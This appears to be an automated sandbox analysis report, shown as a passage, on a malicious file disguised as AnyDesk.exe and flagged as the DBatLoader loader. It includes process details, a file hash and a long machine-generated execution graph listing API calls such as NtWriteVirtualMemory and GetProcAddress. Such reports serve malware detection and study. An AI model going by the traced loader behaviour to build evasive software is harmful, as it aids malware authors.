          2024-11-26 07:13:10 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


          Click to jump to process

          Click to jump to process

          Click to dive into process behavior distribution

          Target ID:0
          Start time:02:11:04
          Start date:26/11/2024
          Path:C:\Users\user\Desktop\AnyDesk.exe
          Wow64 process (32bit):true
          Commandline:"C:\Users\user\Desktop\AnyDesk.exe"
          Imagebase:0x400000
          File size:1'299'968 bytes
          MD5 hash:BCEEA9753420A675AF68CDA43864438E
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:Borland Delphi
          Yara matches:
          • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.2120740305.000000007F880000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
          Reputation:low
          Has exited:false

          Reset < >

            Execution Graph

            Execution Coverage:5.3%
            Dynamic/Decrypted Code Coverage:100%
            Signature Coverage:15.8%
            Total number of Nodes:259
            Total number of Limit Nodes:11
            execution_graph 32521 2b4c350 32524 2b3f7c8 32521->32524 32525 2b3f7d0 32524->32525 32525->32525 32526 2b3f7d7 32525->32526 35133 2b388b8 LoadLibraryW 32526->35133 32528 2b3f7f1 35138 2b22ee0 QueryPerformanceCounter 32528->35138 32530 2b3f7f6 32531 2b3f800 InetIsOffline 32530->32531 32532 2b3f81b 32531->32532 32533 2b3f80a 32531->32533 32535 2b24530 11 API calls 32532->32535 35150 2b24530 32533->35150 32537 2b3f82a 32535->32537 35141 2b24860 32537->35141 35156 2b38274 35133->35156 35135 2b388f1 35167 2b37d78 35135->35167 35139 2b22ef8 GetTickCount 35138->35139 35140 2b22eed 35138->35140 35139->32530 35140->32530 35142 2b24871 35141->35142 35143 2b24897 35142->35143 35144 2b248ae 35142->35144 35145 2b24bcc 11 API calls 35143->35145 35146 2b245a0 11 API calls 35144->35146 35147 2b248a4 35145->35147 35146->35147 35148 2b248df 35147->35148 35149 2b24530 11 API calls 35147->35149 35149->35148 35151 2b24534 35150->35151 35152 2b24544 35150->35152 35151->35152 35154 2b245a0 11 API calls 35151->35154 35153 2b24572 35152->35153 35241 2b22c2c 11 API calls 35152->35241 35153->32537 35154->35152 35157 2b24530 11 API calls 35156->35157 35158 2b38299 35157->35158 35181 2b3798c 35158->35181 35162 2b382b3 35163 2b382bb GetModuleHandleW GetProcAddress GetProcAddress 35162->35163 35164 2b382ee 35163->35164 35202 2b24500 35164->35202 35168 2b24530 11 API calls 35167->35168 35169 2b37d9d 35168->35169 35170 2b3798c 12 API calls 35169->35170 35171 2b37daa 35170->35171 35172 2b247ec 11 API calls 35171->35172 35173 2b37dba 35172->35173 35230 2b381cc 35173->35230 35176 2b38274 15 API calls 35177 2b37dd3 NtWriteVirtualMemory 35176->35177 35178 2b37dff 35177->35178 35179 2b24500 11 API calls 35178->35179 35180 2b37e0c FreeLibrary 35179->35180 35180->32528 35182 2b3799d 35181->35182 35206 2b24bcc 35182->35206 35184 2b37a19 35187 2b247ec 35184->35187 35185 2b379ad 35185->35184 35215 2b2babc CharNextA 35185->35215 35188 2b247f0 35187->35188 35189 2b24851 35187->35189 35190 2b24530 35188->35190 35191 2b247f8 35188->35191 35192 2b24544 35190->35192 35196 2b245a0 11 API calls 35190->35196 35191->35189 35194 2b24530 11 API calls 35191->35194 35197 2b24807 35191->35197 35193 2b24572 35192->35193 35228 2b22c2c 11 API calls 35192->35228 35193->35162 35194->35197 35195 2b245a0 11 API calls 35199 2b24821 35195->35199 35196->35192 35197->35195 35200 2b24530 11 API calls 35199->35200 35201 2b2484d 35200->35201 35201->35162 35203 2b24506 35202->35203 35204 2b2452c 35203->35204 35229 2b22c2c 11 API calls 35203->35229 35204->35135 35207 2b24c09 35206->35207 35208 2b24bd9 35206->35208 35222 2b244dc 35207->35222 35210 2b24c02 35208->35210 35212 2b24be5 35208->35212 35217 2b245a0 35210->35217 35211 2b24bf3 35211->35185 35216 2b22c44 11 API calls 35212->35216 35215->35185 35216->35211 35218 2b245a4 35217->35218 35219 2b245c8 35217->35219 35226 2b22c10 11 API calls 35218->35226 35219->35207 35221 2b245b1 35221->35207 35223 2b244e2 35222->35223 35224 2b244fd 35222->35224 35223->35224 35227 2b22c2c 11 API calls 35223->35227 35224->35211 35226->35221 35227->35224 35228->35193 35229->35203 35231 2b24530 11 API calls 35230->35231 35232 2b381ef 35231->35232 35233 2b3798c 12 API calls 35232->35233 35234 2b381fc 35233->35234 35235 2b38204 GetModuleHandleA 35234->35235 35236 2b38274 15 API calls 35235->35236 35237 2b38215 GetModuleHandleA 35236->35237 35238 2b38233 35237->35238 35239 2b244dc 11 API calls 35238->35239 35240 2b37dcd 35239->35240 35240->35176 35241->35153 35242 2b2e364 35243 2b2e372 VariantClear 35242->35243 35244 2b2e37f 35242->35244 35256 2b2e030 35243->35256 35246 2b2e386 35244->35246 35247 2b2e395 35244->35247 35248 2b244dc 11 API calls 35246->35248 35249 2b2e37d 35247->35249 35250 2b2e3b6 35247->35250 35251 2b2e3ad 35247->35251 35248->35249 35261 2b32ea4 EnterCriticalSection LeaveCriticalSection 35250->35261 35260 2b2e1e8 52 API calls 35251->35260 35254 2b2e3bf 35254->35249 35255 2b2e3cf VariantClear VariantInit 35254->35255 35255->35249 35257 2b2e034 35256->35257 35258 2b2e039 35256->35258 35262 2b2dddc 43 API calls 35257->35262 35258->35249 35260->35249 35261->35254 35262->35258 35263 2b4d2fc 35273 2b2656c 35263->35273 35267 2b4d32a 35278 2b4c35c timeSetEvent 35267->35278 35269 2b4d334 35270 2b4d342 GetMessageA 35269->35270 35271 2b4d336 TranslateMessage DispatchMessageA 35270->35271 35272 2b4d352 35270->35272 35271->35270 35274 2b26577 35273->35274 35279 2b24198 35274->35279 35277 2b242ac SysFreeString SysReAllocStringLen SysAllocStringLen 35277->35267 35278->35269 35280 2b241de 35279->35280 35281 2b24257 35280->35281 35282 2b243e8 35280->35282 35293 2b24130 35281->35293 35285 2b24419 35282->35285 35288 2b2442a 35282->35288 35298 2b2435c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 35285->35298 35287 2b24423 35287->35288 35289 2b2446f FreeLibrary 35288->35289 35290 2b24493 35288->35290 35289->35288 35291 2b244a2 ExitProcess 35290->35291 35292 2b2449c 35290->35292 35292->35291 35294 2b24140 35293->35294 35295 2b24173 35293->35295 35294->35295 35299 2b25868 35294->35299 35303 2b215cc 35294->35303 35295->35277 35298->35287 35300 2b25894 35299->35300 35301 2b25878 GetModuleFileNameA 35299->35301 35300->35294 35307 2b25acc GetModuleFileNameA RegOpenKeyExA 35301->35307 35326 2b21560 35303->35326 35305 2b215d4 VirtualAlloc 35306 2b215eb 35305->35306 35306->35294 35308 2b25b4f 35307->35308 35309 2b25b0f RegOpenKeyExA 35307->35309 35325 2b25908 12 API calls 35308->35325 35309->35308 35310 2b25b2d RegOpenKeyExA 35309->35310 35310->35308 35312 2b25bd8 lstrcpynA GetThreadLocale GetLocaleInfoA 35310->35312 35314 2b25cf2 35312->35314 35315 2b25c0f 35312->35315 35313 2b25b74 RegQueryValueExA 35316 2b25bb2 RegCloseKey 35313->35316 35317 2b25b94 RegQueryValueExA 35313->35317 35314->35300 35315->35314 35318 2b25c1f lstrlenA 35315->35318 35316->35300 35317->35316 35320 2b25c37 35318->35320 35320->35314 35321 2b25c84 35320->35321 35322 2b25c5c lstrcpynA LoadLibraryExA 35320->35322 35321->35314 35323 2b25c8e lstrcpynA LoadLibraryExA 35321->35323 35322->35321 35323->35314 35324 2b25cc0 lstrcpynA LoadLibraryExA 35323->35324 35324->35314 35325->35313 35327 2b21500 35326->35327 35327->35305 35328 2b21c6c 35329 2b21d04 35328->35329 35330 2b21c7c 35328->35330 35331 2b21f58 35329->35331 35332 2b21d0d 35329->35332 35333 2b21cc0 35330->35333 35334 2b21c89 35330->35334 35338 2b21fec 35331->35338 35341 2b21f68 35331->35341 35342 2b21fac 35331->35342 35335 2b21d25 35332->35335 35348 2b21e24 35332->35348 35336 2b21724 10 API calls 35333->35336 35337 2b21c94 35334->35337 35376 2b21724 35334->35376 35339 2b21d2c 35335->35339 35345 2b21d48 35335->35345 35351 2b21dfc 35335->35351 35359 2b21cd7 35336->35359 35347 2b21724 10 API calls 35341->35347 35346 2b21fb2 35342->35346 35352 2b21724 10 API calls 35342->35352 35343 2b21e7c 35344 2b21724 10 API calls 35343->35344 35349 2b21e95 35343->35349 35350 2b21f2c 35344->35350 35356 2b21d79 Sleep 35345->35356 35364 2b21d9c 35345->35364 35353 2b21f82 35347->35353 35348->35343 35348->35349 35355 2b21e55 Sleep 35348->35355 35350->35349 35368 2b21a8c 8 API calls 35350->35368 35354 2b21724 10 API calls 35351->35354 35357 2b21fc1 35352->35357 35369 2b21a8c 8 API calls 35353->35369 35373 2b21fa7 35353->35373 35366 2b21e05 35354->35366 35355->35343 35360 2b21e6f Sleep 35355->35360 35361 2b21d91 Sleep 35356->35361 35356->35364 35370 2b21a8c 8 API calls 35357->35370 35357->35373 35358 2b21ca1 35365 2b21cb9 35358->35365 35400 2b21a8c 35358->35400 35363 2b21a8c 8 API calls 35359->35363 35367 2b21cfd 35359->35367 35360->35348 35361->35345 35363->35367 35372 2b21a8c 8 API calls 35366->35372 35375 2b21e1d 35366->35375 35371 2b21f50 35368->35371 35369->35373 35374 2b21fe4 35370->35374 35372->35375 35377 2b21968 35376->35377 35378 2b2173c 35376->35378 35379 2b21938 35377->35379 35380 2b21a80 35377->35380 35387 2b2174e 35378->35387 35391 2b217cb Sleep 35378->35391 35384 2b21947 Sleep 35379->35384 35394 2b21986 35379->35394 35382 2b21684 VirtualAlloc 35380->35382 35383 2b21a89 35380->35383 35381 2b2175d 35381->35358 35385 2b216bf 35382->35385 35386 2b216af 35382->35386 35383->35358 35389 2b2195d Sleep 35384->35389 35384->35394 35385->35358 35417 2b21644 35386->35417 35387->35381 35388 2b2182c 35387->35388 35392 2b2180a Sleep 35387->35392 35397 2b215cc VirtualAlloc 35388->35397 35399 2b21838 35388->35399 35389->35379 35391->35387 35393 2b217e4 Sleep 35391->35393 35392->35388 35396 2b21820 Sleep 35392->35396 35393->35378 35395 2b215cc VirtualAlloc 35394->35395 35398 2b219a4 35394->35398 35395->35398 35396->35387 35397->35399 35398->35358 35399->35358 35401 2b21aa1 35400->35401 35402 2b21b6c 35400->35402 35404 2b21aa7 35401->35404 35407 2b21b13 Sleep 35401->35407 35403 2b216e8 35402->35403 35402->35404 35406 2b21c66 35403->35406 35408 2b21644 2 API calls 35403->35408 35405 2b21ab0 35404->35405 35410 2b21b4b Sleep 35404->35410 35415 2b21b81 35404->35415 35405->35365 35406->35365 35407->35404 35409 2b21b2d Sleep 35407->35409 35411 2b216f5 VirtualFree 35408->35411 35409->35401 35412 2b21b61 Sleep 35410->35412 35410->35415 35413 2b2170d 35411->35413 35412->35404 35413->35365 35414 2b21c00 VirtualFree 35414->35365 35415->35414 35416 2b21ba4 35415->35416 35416->35365 35418 2b21681 35417->35418 35419 2b2164d 35417->35419 35418->35385 35419->35418 35420 2b2164f Sleep 35419->35420 35421 2b21664 35420->35421 35421->35418 35422 2b21668 Sleep 35421->35422 35422->35419

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 0 2b3f7c8-2b3f7cb 1 2b3f7d0-2b3f7d5 0->1 1->1 2 2b3f7d7-2b3f808 call 2b388b8 call 2b22ee0 call 2b22f08 InetIsOffline 1->2 9 2b3f81b-2b3f825 call 2b24530 2->9 10 2b3f80a-2b3f819 call 2b24530 2->10 14 2b3f82a-2b3faed call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b3f6e8 9->14 10->14 115 2b3faf3-2b3fafa call 2b3f744 14->115 116 2b4b2ff-2b4b783 call 2b24500 * 5 call 2b24c60 call 2b244dc call 2b24c60 call 2b24500 * 2 call 2b24c60 call 2b24500 * 5 call 2b24c60 call 2b24500 call 2b24c60 call 2b24500 call 2b244dc call 2b24500 * 3 call 2b24c78 call 2b24500 call 2b24c78 call 2b24500 call 2b244dc call 2b24500 * 2 call 2b24c60 call 2b244dc call 2b24c60 call 2b24500 call 2b24c60 call 2b244dc call 2b24c60 call 2b24500 * 2 call 2b244dc call 2b24500 * 2 call 2b24c60 call 2b244dc call 2b24c60 call 2b24500 * 2 call 2b244dc call 2b24500 call 2b257dc call 2b24500 call 2b244dc call 2b24500 * 2 call 2b2e3f4 call 2b24500 call 2b25eac call 2b24500 call 2b257dc call 2b24500 * 4 call 2b257dc call 2b24500 call 2b24c60 call 2b24500 call 2b24c60 call 2b24500 * 2 call 2b257dc call 2b24500 call 2b24c60 call 2b24500 * 5 14->116 115->116 121 2b3fb00-2b40421 call 2b246d4 * 2 call 2b389d0 call 2b246d4 * 2 call 2b389d0 call 2b246d4 * 2 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b246d4 * 2 call 2b389d0 call 2b246d4 * 2 call 2b389d0 call 2b246d4 * 2 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b246d4 * 2 call 2b389d0 call 2b246d4 * 2 call 2b389d0 call 2b246d4 * 2 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b246d4 * 2 call 2b389d0 call 2b246d4 * 2 call 2b389d0 call 2b246d4 * 2 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b246d4 * 2 call 2b389d0 call 2b246d4 * 2 call 2b389d0 call 2b246d4 * 2 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b38b14 call 2b249a0 call 2b246d4 call 2b3e0f8 call 2b24530 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b247ec call 2b27e5c 115->121 550 2b40534-2b40647 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b3e0f8 call 2b24530 121->550 551 2b40427-2b4051a call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 121->551 612 2b4064c-2b40774 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b2c364 call 2b24530 550->612 607 2b4051f-2b4052f call 2b24530 551->607 607->612 646 2b40776-2b40779 612->646 647 2b4077b-2b40b3c call 2b24a00 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b3e0f8 call 2b24530 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b249a0 call 2b246d4 call 2b27e5c 612->647 646->647 758 2b40b42-2b40f97 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24de0 call 2b3dd70 call 2b24530 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b3e24c call 2b25818 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24530 call 2b3e1d4 647->758 759 2b412fe-2b418d6 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24de0 call 2b3dd70 call 2b24530 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b3e24c call 2b25818 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24530 * 2 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b3e1d4 647->759 1012 2b40f9d-2b412f9 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b249a0 call 2b24d74 call 2b3dd70 call 2b24530 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 758->1012 1013 2b42ad8-2b42cc3 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 758->1013 759->1013 1145 2b418dc-2b41e0b call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b27acc call 2b3f16c call 2b24530 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b3e24c call 2b25818 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 759->1145 1012->1013 1180 2b42cc8-2b42cdb 1013->1180 1497 2b41e15-2b4202a call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24530 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b3e4b8 1145->1497 1183 2b42ce2-2b42ce7 1180->1183 1184 2b42cdd-2b42ce0 1180->1184 1183->116 1187 2b42ced-2b43571 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b27acc call 2b3f16c call 2b24530 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b3f108 call 2b24530 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24764 call 2b3e24c call 2b25818 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24530 * 10 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b249a0 call 2b246d4 call 2b27e80 1183->1187 1184->1183 1729 2b43577-2b43708 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b249a0 call 2b246d4 call 2b28048 1187->1729 1730 2b4370d-2b43818 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 1187->1730 1619 2b42ac5-2b42ad2 1497->1619 1620 2b42030-2b42139 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b3f00c 1497->1620 1619->1013 1619->1497 1620->1619 1682 2b4213f-2b421b6 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 1620->1682 1710 2b421bb-2b42226 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 1682->1710 1737 2b4222b-2b4225a call 2b389d0 CoInitialize call 2b24860 1710->1737 1729->1730 1817 2b4381f-2b43a37 call 2b24a00 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b248ec 1730->1817 1818 2b4381a-2b4381d 1730->1818 1749 2b4225f-2b422a9 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 1737->1749 1779 2b422ae-2b422b5 call 2b389d0 1749->1779 1785 2b422ba-2b42325 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 1779->1785 1821 2b4232a-2b42341 call 2b389d0 call 2b36dc8 1785->1821 1959 2b45530-2b45d82 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b3e398 call 2b24530 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b27acc call 2b3f16c call 2b24530 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b3f094 call 2b3f108 call 2b24530 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 2b246d4 call 2b247ec call 2b249a0 call 2b246d4 call 2b389d0 call 2b24860 call 2b249a0 call 